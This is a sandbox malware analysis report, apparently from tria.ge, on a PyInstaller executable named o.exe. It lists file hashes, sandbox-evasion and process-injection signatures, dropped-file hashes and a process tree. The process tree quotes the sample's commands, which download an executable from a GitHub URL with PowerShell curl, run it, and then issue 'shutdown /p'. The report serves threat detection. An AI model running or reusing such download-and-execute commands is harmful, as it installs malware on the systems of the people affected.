Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
114s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231025-en -
resource tags
-
submitted
16/11/2023, 17:05
Errors
General
-
Target
o.exe
-
Size
6.7MB
-
MD5
ef16a9d4cc64345934afa6e66e7890d4
-
SHA1
b0ad21bddaa395b73d410a84e6d96ff9277aa105
-
SHA256
d3f467f4f4c92504d018488c565f2f944d286869b4f6c08b27d77c3be2a4811e
-
SHA512
ec2f79ebedad68f4d1bb68ebd3b05ba244ae98251e6ba49efe9dcc41c2f1ec0174eb9dfcbc04a33dba7f3e143f44df56768af1b01c8c31e977024fecaa2f56a2
-
SSDEEP
196608:fW1k/w1W903eV4QS993iObMGuLmGQ1Zc:+2/mW+eGQ493iObyLxQc
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Detects Pyinstaller 3 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\o.exe"C:\Users\Admin\AppData\Local\Temp\o.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\o.exe"C:\Users\Admin\AppData\Local\Temp\o.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell curl https://github.com/DitoisBest/pics/raw/main/!.exe -o update.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell curl https://github.com/DitoisBest/pics/raw/main/!.exe -o update.exe4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell ./update.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ./update.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\update.exe"C:\Users\Admin\AppData\Local\Temp\update.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\update.exe"C:\Users\Admin\AppData\Local\Temp\update.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c shutdown /p3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\shutdown.exeshutdown /p4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3921055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
Filesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
Filesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
Filesize
82KB
MD528ede9ce9484f078ac4e52592a8704c7
SHA1bcf8d6fe9f42a68563b6ce964bdc615c119992d0
SHA256403e76fe18515a5ea3227cf5f919aa2f32ac3233853c9fb71627f2251c554d09
SHA5128c372f9f6c4d27f7ca9028c6034c17deb6e98cfef690733465c1b44bd212f363625d9c768f8e0bd4c781ddde34ee4316256203ed18fa709d120f56df3cca108b
-
Filesize
247KB
MD5baaa9067639597e63b55794a757ddeff
SHA1e8dd6b03ebef0b0a709e6cccff0e9f33c5142304
SHA2566cd52b65e11839f417b212ba5a39f182b0151a711ebc7629dc260b532391db72
SHA5127995c3b818764ad88db82148ea0ce560a0bbe9594ca333671b4c5e5c949f5932210edbd63d4a0e0dc2daf24737b99318e3d5daaee32a5478399a6aa1b9ee3719
-
Filesize
63KB
MD5c888ecc8298c36d498ff8919cebdb4e6
SHA1f904e1832b9d9614fa1b8f23853b3e8c878d649d
SHA25621d59958e2ad1b944c4811a71e88de08c05c5ca07945192ab93da5065fac8926
SHA5127161065608f34d6de32f2c70b7485c4ee38cd3a41ef68a1beacee78e4c5b525d0c1347f148862cf59abd9a4ad0026c2c2939736f4fc4c93e6393b3b53aa7c377
-
Filesize
155KB
MD5d386b7c4dcf589e026abfc7196cf1c4c
SHA1c07ce47ce0e69d233c5bdd0bcac507057d04b2d4
SHA256ad0440ca6998e18f5cc917d088af3fea2c0ff0febce2b5e2b6c0f1370f6e87b1
SHA51278d79e2379761b054df1f9fd8c5b7de5c16b99af2d2de16a3d0ac5cb3f0bd522257579a49e91218b972a273db4981f046609fdcf2f31cf074724d544dac7d6c8
-
Filesize
77KB
MD52c0ec225e35a0377ac1d0777631bffe4
SHA17e5d81a06ff8317af52284aedccac6ebace5c390
SHA256301c47c4016dac27811f04f4d7232f24852ef7675e9a4500f0601703ed8f06af
SHA512aea9d34d9e93622b01e702defd437d397f0e7642bc5f9829754d59860b345bbde2dd6d7fe21cc1d0397ff0a9db4ecfe7c38b649d33c5c6f0ead233cb201a73e0
-
Filesize
1.4MB
MD5d220b7e359810266fe6885a169448fa0
SHA1556728b326318b992b0def059eca239eb14ba198
SHA256ca40732f885379489d75a2dec8eb68a7cce024f7302dd86d63f075e2745a1e7d
SHA5128f802c2e717b0cb47c3eeea990ffa0214f17d00c79ce65a0c0824a4f095bde9a3d9d85efb38f8f2535e703476cb6f379195565761a0b1d738d045d7bb2c0b542
-
Filesize
4.9MB
MD551e8a5281c2092e45d8c97fbdbf39560
SHA1c499c810ed83aaadce3b267807e593ec6b121211
SHA2562a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA51298b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb
-
Filesize
5.5MB
MD565e381a0b1bc05f71c139b0c7a5b8eb2
SHA17c4a3adf21ebcee5405288fc81fc4be75019d472
SHA25653a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA5124db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39
-
Filesize
5.5MB
MD565e381a0b1bc05f71c139b0c7a5b8eb2
SHA17c4a3adf21ebcee5405288fc81fc4be75019d472
SHA25653a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA5124db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39
-
Filesize
29KB
MD58472d39b9ee6051c961021d664c7447e
SHA1b284e3566889359576d43e2e0e99d4acf068e4fb
SHA2568a9a103bc417dede9f6946d9033487c410937e1761d93c358c1600b82f0a711f
SHA512309f1ec491d9c39f4b319e7ce1abdedf11924301e4582d122e261e948705fb71a453fec34f63df9f9abe7f8cc2063a56cd2c2935418ab54be5596aadc2e90ad3
-
Filesize
1.1MB
MD557f8f40cf955561a5044ddffa4f2e144
SHA119218025bcae076529e49dde8c74f12e1b779279
SHA2561a965c1904da88989468852fdc749b520cce46617b9190163c8df19345b59560
SHA512db2a7a32e0b5bf0684a8c4d57a1d7df411d8eb1bc3828f44c95235dd3af40e50a198427350161dff2e79c07a82ef98e1536e0e013030a15bdf1116154f1d8338
-
Filesize
106KB
MD549c96cecda5c6c660a107d378fdfc3d4
SHA100149b7a66723e3f0310f139489fe172f818ca8e
SHA25669320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d
-
Filesize
106KB
MD549c96cecda5c6c660a107d378fdfc3d4
SHA100149b7a66723e3f0310f139489fe172f818ca8e
SHA25669320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d
-
Filesize
120KB
MD56114277c6fc040f68d25ca90e25924cd
SHA1028179c77cb3ba29cd8494049421eaa4900ccd0e
SHA256f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656
SHA51276e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d
-
Filesize
1.4MB
MD56e746d96de218f599b7a508e7d4429e1
SHA1b4ed74cc0b51dc3d88eb4b9bcc5a9467a45de43c
SHA2562999b0766238d80aa8d098b74259f839a7281775bf54198a57c132675dd625f5
SHA512e2e979a79e6109d3776d43003f7ca8d23e132278a6dbb40afdb5eb4228e64f4bbb393e6825f334909e31c75e0051e49444baf415557780e5a51330aebdc67ee7
-
Filesize
5.5MB
MD558e01abc9c9b5c885635180ed104fe95
SHA11c2f7216b125539d63bd111a7aba615c69deb8ba
SHA256de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837
SHA512cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081
-
Filesize
5.5MB
MD558e01abc9c9b5c885635180ed104fe95
SHA11c2f7216b125539d63bd111a7aba615c69deb8ba
SHA256de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837
SHA512cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
13.6MB
MD5ba5f16874016777665b414b74ac0a5e5
SHA116697d31a5ea1f3bb125382e2a90821111d13270
SHA256e21fe434f186aa7e331f629cffe6eee09dc994c097f6628e981f14835242c0b2
SHA512e4398ba1fdfd5d40fe231b88c998126465260b7234dc69d58fb605995e7b818d3fd3adc139cde55aba2b1818cecf8741107fa75b0afa36e401b0f9b6bee8f5cf
-
Filesize
13.6MB
MD5ba5f16874016777665b414b74ac0a5e5
SHA116697d31a5ea1f3bb125382e2a90821111d13270
SHA256e21fe434f186aa7e331f629cffe6eee09dc994c097f6628e981f14835242c0b2
SHA512e4398ba1fdfd5d40fe231b88c998126465260b7234dc69d58fb605995e7b818d3fd3adc139cde55aba2b1818cecf8741107fa75b0afa36e401b0f9b6bee8f5cf
-
Filesize
13.6MB
MD5ba5f16874016777665b414b74ac0a5e5
SHA116697d31a5ea1f3bb125382e2a90821111d13270
SHA256e21fe434f186aa7e331f629cffe6eee09dc994c097f6628e981f14835242c0b2
SHA512e4398ba1fdfd5d40fe231b88c998126465260b7234dc69d58fb605995e7b818d3fd3adc139cde55aba2b1818cecf8741107fa75b0afa36e401b0f9b6bee8f5cf
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB